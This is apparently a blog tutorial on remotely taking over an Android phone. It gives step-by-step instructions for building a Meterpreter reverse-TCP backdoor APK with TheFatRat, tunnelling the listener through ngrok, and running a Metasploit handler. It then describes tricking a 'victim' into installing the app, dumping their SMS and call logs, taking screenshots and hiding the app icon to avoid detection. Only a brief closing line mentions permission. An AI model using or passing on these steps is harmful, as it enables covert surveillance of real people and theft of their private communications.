How to Hack Android Remotely (100% working)

How to Hack Android

Ever thought that the phone you are holding can be controlled by someone else? Yes it’s true that someone with knowledge in hacking can easily hack your phone, especially when you don’t have awareness. So we will show you how to hack android remotely so that you can keep yourself safe and can learn more about cyber security.

You can install kali linux for this tutorial and especially if you are going inside cybersecurity field. See our how to install kali linux section to install it.

In this section we will hack android without touching target’s phone and we will also see some of the commands we can run after hacking android phone.

Making backdoor with fatrat

You can download fatrat from github, just type fatrat github in your browser and you will see github page of fatrat tool. Simply copy the url and paste in your terminal by typing git clone <URL>.git

After this step fatrat get installed in your kali linux and then open the tool as — cd TheFatRat/. After getting inside fatrat you have to give permissions to execute by typing — chmod +x setup.sh. Now you are ready to go.

Now go inside fatrat folder and type ./fatrat as you can see in below image.

As you can see from image we have to type 1 to go for msfvenom backdoor, and for starting, msfvenom is good as you have to be aware with metasploit also.

So after selecting 1 option in fatrat we get options as shown in image below.

Now you have to choose option 3 for creating android apk backdoor. After this you will be asked for lport which is the port to listen incoming connections. Also it will ask for lhost which is our local ip for connecting.

You have to put lhost and lport as shown below inside starting ngrok section.

After this you have to choose android/meterpreter/reverse_tcp as some options pop up in front of you.


Now finally our backdoor apk is formed and is stored in output file inside fatrat folder.

You can keep name of apk according to you wish.

Ngrok

Ngrok is one of the most popular tunnel service platform through which you can easily expose your local servers which is behind NATs/Firewalls to the public internet over secure tunnels.

It connects to the ngrok cloud service which accepts traffic on a public address and relays that traffic through to the ngrok process running on your machine and then on to the local address you specified.

Feaures of ngrok

  • you can instantly create a public HTTP/HTTPS URL for a website running locally in your development machine.
  • Their tunnels are very fast and works on HTTP/2 protocol which actually speeds up your loading.
  • You don’t need to do any kind of port forwarding while using Ngrok.
  • You can even expose your network service to the internet with the help of TCP tunneling.
  • Multiple simulatenously tunnels can be worked.

creating account in ngrok

step 1 – Create a Free Account on Ngrok.com, basically you can create an account on Ngrok by three ways.

  • Gmail
  • github
  • personal email

You can choose any way for signing up into Ngrok.

step 2 – After confirming the account with your mail ID, try to login with the same details which you’ve used while creating the account.

Step 3– After successful signup, you’ll see a Dashboard Page in front of you just like below:

step 4 – Now you need to download the Ngrok package from the Download Page.

Based on your operating system, you can choose the file and ngrok supports all OS (Windows/Linux/MacOSX)

Step 5–  Next step is to install the package which you’ve downloaded from previous step.

  • To extract the package in Linux/MacOSX – type “unzip /path/to/ngrok.zip” in your command terminal.

Starting ngrok

Start tunnel by going inside ngrok as ./ngrok tcp 4444 (inside terminal) where tcp is a protocol to forward your connection and 4444 is the port number selected for connection

Now as you can see something similar to link is present. Copy the part shown in picture below to your lhost while creating backdoor apk through fatrat.

Now copy the part shown in below image inside your lport at time of bacdoor creation in fatrat.

Now keep a name for your apk and you are ready to go.

Metasploit listner

Now you have to open metasploit by typing msfconsole inside your terminal. Metasploit-framework is preinstalled in kali linux. You will get an interface as shown in image below.

Now simply type use exploit/multi/handler

After that type set payload android/meterpreter/reverse_tcp. A payload refers to the component of a computer virus that executes a malicious activity.

reverse_tcp is used because if we try to make connection with target then firewall could block us but in reverse case target try to make connection with us, hence connection not get blocked.

After above steps you have to write set lport <port number> and also set lhost <local ip>. Use lhost as 0.0.0.0 and lport as used in ngrok (eg – ./ngrok tcp 4444 ,so port number is 4444). After this you have to type run or execute to start connection.

Final step

Finally go inside your browser and type file upload, after that you will get many free file uploading services.

Simply select any one and upload your file. You will be given a link which you can send to your victim and social engineer him to open your link. Once he/she opened your apk then you can see that connections start establishing between victim phone and your kali linux.

And now you can see that finally a meterpreter session gets opened.

What’s after hacking an android

After victim’s phone is hacked you can simply run -help command to see options available to you.

You can type dump_sms or dump_calllog. After this all sms or call logs inside victim’s phone is saved inside your kali as a text document and you can read everything.

Play– you can use play option to play any sound in victim’s phone. This is a cool trick to make your victim shock. Just type play <path to your audio>

Most important is the hide_app_icon command. As soon as you hack any phone, firstly run this command so that your app icon disappers from victim’s home screen. This is a important step as if victim is not a technical person, he can’t find the app and think that it is not present anymore.

screenshot – With this command you can take screenshot of victim’s phone and have a watch on him/her.

There are lot more commands you have to run yourself and practice more and more so that you can have a mastery on these commands. So we end this session on how to hack android remotely. Meet you soon with new topic.

Never try this on anybody without permission. Otherwise you can be in big problem.

 

Comments

Popular Posts